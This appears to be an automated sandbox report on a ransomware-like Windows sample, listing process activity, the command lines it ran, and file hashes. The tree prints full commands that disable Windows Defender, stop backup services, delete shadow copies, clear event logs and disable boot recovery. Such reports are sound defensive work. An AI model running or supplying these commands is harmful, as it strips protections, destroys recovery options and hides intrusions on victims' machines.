wrote to memory of 2136 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 2136 wrote to memory of 3272 2136 net.exe net1.exe PID 2136 wrote to memory of 3272 2136 net.exe net1.exe PID 3440 wrote to memory of 3268 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3440 wrote to memory of 3268 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3268 wrote to memory of 644 3268 net.exe net1.exe PID 3268 wrote to memory of 644 3268 net.exe net1.exe PID 3440 wrote to memory of 812 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 812 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 3864 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 3864 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1064 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1064 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1276 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1276 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1496 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1496 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1704 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1704 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1904 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 1904 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 2160 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 2160 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 2480 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 2480 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 3440 wrote to memory of 2688 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe PID 3440 wrote to memory of 2688 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe PID 3440 wrote to memory of 2632 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe PID 3440 wrote to memory of 2632 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe PID 3440 wrote to memory of 3124 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe PID 3440 wrote to memory of 3124 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe PID 3440 wrote to memory of 2600 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe PID 3440 wrote to memory of 2600 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe PID 3440 wrote to memory of 4836 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe PID 3440 wrote to memory of 4836 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3176
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:4080
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:4252
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:4376
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4340
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:760
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3808
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:3272
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12e93" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12e93" /y3⤵PID:644
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:812
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:3864
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1064
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1276
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1496
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1704
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1904
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2160
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12e93" start= disabled2⤵PID:2480
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2688
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2632
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3124
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2600
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4836
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1088
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:4960
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:4684
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2980
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:4892
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:4588
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:4748
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2956
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:5088
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:604
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:752
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:4604
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:4936
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:4496
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2192
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2008
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:3848
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1940
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2304
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2812 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3056 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:4732 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2252
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2316
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3028
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3724
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3840 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3280
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5104 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2924 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4004 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4248 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:784 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3796 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3808
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3164 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:520 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2916
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
6e54df56375acaede52048ff2649bac7
SHA1fe2b2651742a059072d9bd875137d50232af1479
SHA2567d7d9f0bdc84d4e934ae983ccc9c5b3339184f8237393dc1daffba4be48d72d1
SHA512883e18d16a027b2272dbd4437bf078996edee77ff432679987551565c9f15da7b57c18c53429984a9038c654c2fbbbaf2cb8f080067e5c9cb6bb48000cd7d0c2